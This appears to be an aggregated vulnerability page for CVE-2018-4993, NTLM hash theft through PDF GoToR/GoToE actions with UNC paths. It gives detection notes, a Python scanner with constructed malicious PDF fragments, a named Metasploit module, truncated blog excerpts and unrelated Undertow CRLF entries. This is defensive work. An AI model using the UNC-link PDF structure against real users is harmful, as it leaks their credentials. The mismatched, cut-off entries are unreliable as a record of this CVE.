CVE-2018-4993
Published 2018-07-09
Priority: P268high · CVSS 3.0: 7.5
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploit: yes
EPSS: 86.52% (99.7th percentile)
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | acrobat_dc | 15.006.30060 – 15.006.30417 | — |
| adobe | acrobat_dc | 15.008.20082 – 18.011.20038 | — |
| adobe | acrobat_dc | 17.011.30059 – 17.011.30079 | — |
| adobe | acrobat_reader_dc | 15.006.30060 – 15.006.30417 | — |
| adobe | acrobat_reader_dc | 15.008.20082 – 18.011.20038 | — |
| adobe | acrobat_reader_dc | 17.011.30059 – 17.011.30079 | — |
| pdf-xchange | pdf-xchange_editor | < 8.0.330.0 | 8.0.330.0 |
Detection & IOCs (extracted from sources)
- Look for PDF files containing /AA (Additional Actions) dictionary entries with /O (page open) actions using /S /GoToR or /S /GoToE action types pointing to UNC (\\server\share) paths in the /F field; this triggers automatic NTLM credential leakage to an attacker-controlled SMB server.
- The incomplete May 2018 patch (APSB18-09) only fixed the GoToR action type; malicious PDFs exploiting the unpatched GoToE (GoToEmbedded) action type bypass the fix and were observed in the wild, submitted to VirusTotal in May 2018.
- The Metasploit module 'auxiliary/fileformat/badpdf' generates malicious PDFs embedding a UNC link for NetNTLM credential capture; hunt for PDF files created by or matching the structure of this module.
- Both GoToR (GoToRemote) and GoToE (GoToEmbedded) action types are vulnerable; the May 2018 patch (APSB18-09) only addressed GoToR. Detections must cover both /S /GoToR and /S /GoToE in PDF /AA dictionaries to avoid missing the bypass variant (CVE-2018-15979).
- All Windows PDF viewers are affected, not just Adobe products; scope detection and blocking rules to cover any PDF reader process initiating SMB connections.
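A scanner for the indicator described above, added here as an illustration and not code from the page or any of its sources: it pairs PDF dictionary delimiters, locates /S /GoToR and /S /GoToE actions, unescapes the literal-string /F target (including octal escapes such as \134 for a backslash, which would otherwise hide the UNC prefix) and reports UNC targets, flagging those under /AA /O or /OpenAction that fire without a click. The sample fragment is constructed, the forward-slash //server/share spelling is an assumption, and hex-string or indirect-object targets are not handled.

```python
import re

ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b")                  # both action types (GoToE = CVE-2018-15979 bypass)
FILE_RE = re.compile(rb"/F\s*\((?P<target>(?:\\.|[^\\)])*)\)", re.S)  # /F given as a literal string
ESC_RE = re.compile(rb"\\([0-7]{1,3}|.)", re.S)                    # backslash escapes inside literal strings
DELIM_RE = re.compile(rb"<<|>>")

def pdf_unescape(raw):
    # Resolve '\\' and octal escapes (\134 is a backslash) so an obfuscated UNC prefix still matches.
    def one(m):
        esc = m.group(1)
        return bytes([int(esc, 8) & 0xFF]) if esc[:1] in b"01234567" else esc
    return ESC_RE.sub(one, raw)

def dict_spans(data):
    """Pair every '<<' with its matching '>>' and return their (start, end) byte offsets."""
    stack, spans = [], []
    for m in DELIM_RE.finditer(data):
        if m.group() == b"<<":
            stack.append(m.start())
        elif stack:
            spans.append((stack.pop(), m.end()))
    return spans

def key_before(data, start):
    """Dictionary key whose value starts at offset 'start' ('O' under /AA, 'A' on a link annotation, ...)."""
    m = re.search(rb"/([A-Za-z]+)\s*$", data[:start])
    return m.group(1).decode() if m else ""

def find_unc_actions(pdf):
    """Return [(action, target, fires_on_open)] for GoToR/GoToE actions whose /F is a UNC path."""
    spans, hits = dict_spans(pdf), []
    for m in ACTION_RE.finditer(pdf):
        inner = [s for s in spans if s[0] < m.start() < s[1]]
        if not inner:
            continue
        start, end = max(inner)                       # innermost enclosing dictionary is the action itself
        for f in FILE_RE.finditer(pdf, start, end):
            target = pdf_unescape(f.group("target"))
            # '\\server\share' as in the IOC above; '//server/share' is an assumed forward-slash spelling
            if target.startswith((b"\\\\", b"//")):
                auto = key_before(pdf, start) in ("O", "OpenAction")  # /AA /O or /OpenAction: no click needed
                hits.append((m.group(1).decode(), target.decode("latin-1"), auto))
    return hits

# Constructed fragment in the shape the IOC describes (not a complete or real PDF):
SAMPLE = (
    b"1 0 obj << /Type /Page /AA << /O << /S /GoToE /F (\\\\\\\\fileserver\\\\share\\\\doc.pdf) >> >> >> endobj\n"
    b"2 0 obj << /Subtype /Link /A << /S /GoToR /F (\\134\\134203.0.113.5\\134s\\134x.pdf) >> >> endobj\n"
    b"3 0 obj << /Subtype /Link /A << /S /GoToR /F (appendix.pdf) >> >> endobj\n"
)
```

Running `find_unc_actions(SAMPLE)` reports the GoToE action as auto-firing and the octal-obfuscated GoToR link as click-triggered, while the local appendix link is ignored.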
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| ghsa | | 6.1 | MEDIUM | |
| vendor_redhat | | 6.1 | MEDIUM | |
GHSA: GHSA-2pj4-mr9m-qwww
ghsa_unreviewed · 2022-05-24 · CVSS 7.5 · CVE-2019-17497 [HIGH] · CWE-522
Tracker PDF-XChange Editor before 8.0.330.0 has an NTLM SSO hash theft vulnerability using crafted FDF or XFDF files (a related issue to CVE-2018-4993). For example, an NTLM hash is sent for a link to \\192.168.0.2\C$\file.pdf without user interaction.
GHSA: GHSA-4rxx-6c3r-g2p4
ghsa_unreviewed · 2022-05-14 · CVE-2018-4993 [HIGH] · CWE-200
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.
GHSA: Improper Neutralization of CRLF Sequences in HTTP Headers in Undertow
ghsa · 2022-05-13 · CVSS 6.1 · CVE-2018-1067 [MEDIUM] · CWE-113
In Undertow before versions 7.1.2.CR1, 7.1.2.GA it was found that the fix for CVE-2016-4993 was incomplete and Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also response splitting, due to insufficient sanitization and validation of user input before the input is used as part of an HTTP header value.
Red Hat: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
vendor_redhat · 2018-04-25 · CVSS 6.1 · CVE-2018-1067 [MEDIUM] · CWE-113
In Undertow before versions 7.1.2.CR1, 7.1.2.GA it was found that the fix for CVE-2016-4993 was incomplete and Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also response splitting, due to insufficient sanitization and validation of user input before the input is used as part of an HTTP header value.
Package: tomcat5 (Red Hat Enterprise Linux 5) - Not affected
Package: t
No detection rules found.
SentinelOne: Malicious PDFs | Revealing the Techniques Behind the Attacks
blogs_sentinelone · 2019-03-27
Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague, in particular, email users. Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.
## How Do PDF Files Execute Code?
Regular readers of the SentinelOne blog will be familiar with the idea of malicious Office attachments that run VBA code from Macros or use DDE to deliver attacks, but not so well-known is how PDFs can execute code.
I
Tenable: Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)
blogs_tenable · 2018-11-14 · CVSS 7.5 · CVE-2018-15979 [HIGH]
# Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)
Satnam Narang, November 14, 2018
Researchers have reported an incomplete fix for CVE-2018-4993, an NTLM credential leaking vulnerability that was supposed to be patched in May 2018. Adobe has now released a complete fix.
### Background
On November 13, Adobe published its monthly security bulletins as part of its monthly release cycle in conjunction with Microsoft’s Patch Tuesday. The November security bulletins include a fix for a vulnerability that was believed to have been patched in May 2018’s security bulletins. However, security researchers at EdgeSpot discovered that the May 2018 fix was incomplete.
### Vulnerability details
Researchers at Check Po
Check Point: NTLM Credentials Theft via PDF Files
blogs_checkpoint · 2018-04-26 · CVE-2018-4993
## NTLM Credentials Theft via PDF Files
Just a few days after it was reported that malicious actors can exploit a vulnerability in MS Outlook using OLE to steal a Windows user's NTLM hashes,
Zscaler: Zscaler protects against 38 new vulnerabilities for Adobe Fl
blogs_zscaler
Bugzilla: CVE-2018-1067 wildfly: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) [fedora-all]
bugzilla · 2018-06-19 · CVSS 6.1 · CVE-2018-1067 [MEDIUM]
This is an automatically created tracking bug! It was created to ensure that one or more security vulnerabilities are fixed in affected versions of fedora-all.
For comments that are specific to the vulnerability please use bugs filed against the "Security Response" product referenced in the "Blocks" field.
For more information see: http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next comment(s). This will include the bug IDs of this tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the fedpkg commit message.
Bugzilla: CVE-2018-1067 undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)
bugzilla · 2018-03-01 · CVSS 6.1 · CVE-2018-1067 [MEDIUM]
A flaw was reported in WildFly 12.0.0.CR1: the web server is vulnerable to the injection of arbitrary HTTP headers due to insufficient sanitisation and validation of UTF-8 encoded user input before it is used as part of an HTTP header value.
Although there is protection against CRLF injection by detecting the presence of a newline character (0x0a), it can be bypassed using characters encoded in UTF-8, as the page will try to convert them back to the original Unicode form and extract the last byte.
Discussion:
Acknowledgments:
Name: Ammarit Thongthua (Deloitte Thailand Pentest team), Nattakit Intarasorn (Deloitte Thailand Pentest team)
---
This issue has been addressed in the fol